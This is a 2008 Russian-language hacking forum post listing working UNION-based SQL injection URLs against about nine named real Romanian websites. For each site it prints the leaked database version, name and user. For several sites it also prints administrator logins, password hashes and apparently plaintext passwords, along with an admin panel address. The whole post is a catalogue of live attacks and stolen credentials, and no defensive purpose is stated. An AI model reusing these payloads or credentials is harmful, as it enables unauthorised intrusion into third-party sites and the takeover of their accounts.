|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.topsport.ro/Web/News.php?NewsID=533+union+select+1,aes_decrypt(aes _encrypt(concat_ws(0x3a,version(),database(),user( )),0x71),0x71),3,4,5,6+limit+1,1/*
Database Version: 4.1.4-gamma-max-log
Database name: topsport
User name: root@localhost
нашел только mysql.user но ничего интересного там нет
http://www.datacont.ro/index2.php?newsid=-93+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Ver sion(),0x3a,Database(),0x3a,User()),0x71),0x71),2, 3,4,5,6,7,8,9,10--
Database Version: 51a-community-log
Database name: datacont_one
User name: datacont_gigiftp@localhost
из information.schema_tables и information.schema_columns интересное только
abcn_users
http://www.datacont.ro/index2.php?newsid=-93+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT((SE LECT+CONCAT(name,login,password)+FROM+datacont_one .abcn_users+LIMIT+0,1)),0x71),0x71),2,3,4,5,6,7,8, 9,10--
Administrator:corada:25033b69ce6b84e5efaf67667bdff b52e1
http://www.dentland.ro/index.php?newsid=28+UNION+SELECT+1,AES_DECRYPT(AES _ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,Use r()),0x71),0x71),3,4,5,6,7,8,9+LIMIT+1,1--
Database Version: 4.1.22-standard-log
Database name: dentland_dent
User name: dentland_dentlan@localhost
http://www.dentland.ro/index.php?newsid=-28+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_W S(0x3a,name,password,username),0x71),0x71),3,4,5,6 ,7,8,9+FROM+jos_users+LIMIT+0,1--
Administrator:ada6360c5d3d4ca341930bd574c9f9aa:0En DhTTFqxPkZGCb:admin
http://www.arhitectura1906.ro/newsdetail.php?id_nws=26+UNION+SELECT+1,2,CONCAT_W S(0x3a,Version(),User(),Database()),4,5,6,7,8,9,10 ,11,12,13,14,15,16+LIMIT+1,1/*
Database Version: 4.1.22-standard
Database name: usr_web15_2
User name: web15@localhost
http://www.3minute.ro/stire.php?NewsID=12746+UNION+SELECT+1,AES_DECRYPT( AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),Us er()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21+LIMIT+1,1&NewsCategoryID=13&Back URL=Lw==
Database Version: 5.0.51a-community-log
Database name: minute_db
User name: minute_user@localhost
как ни странно но ничего интересного не нашел в БД..может я не смотрел..но никакого подозрения на наличие пасов или юзеров я не нашел
http://www.btldesign.ro/detalii-noutate.php?newsID=46+UNION+SELECT+1,AES_DECRYPT(A ES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),Use r()),0x71),0x71),3,4,5,6,7,8+LIMIT+1,1/*
Database Version: 4.1.22-standard
Database name: ionradu_btl
User name: ionradu_btl@localhost
http://www.btldesign.ro/detalii-noutate.php?newsID=-46+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_W S(0x3a,pass,user,userid),0x71),0x71),3,4,5,6,7,8+F ROM+user+LIMIT+0,1/*
btldesign2003:admin:1
xadmin:designit:2
http://www.btldesign.ro/admin
http://www.ecotic.ro/comunicate.php?NewsId=-20+UNION+SELECT+1,2,3,4,5,CONCAT_WS(0x3a,User(),Ve rsion(),Database()),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22/*
Database Version: 4.1.20-log
Database name: ecotic
User name: ecotic@localhost
http://magureanusiasociatii.eu/news.php?go=fullnews&newsid=-2+union+select+1,2,3,4,CONCAT_WS(0x3a,user(),versi on(),database()),6,7/*
Database Version: 4.0.27-standard
Database name: magurean_gm
User name: magurean@localhost
всем спасибо.
Последний раз редактировалось Gorev; 13.07.2008 в 13:55..
|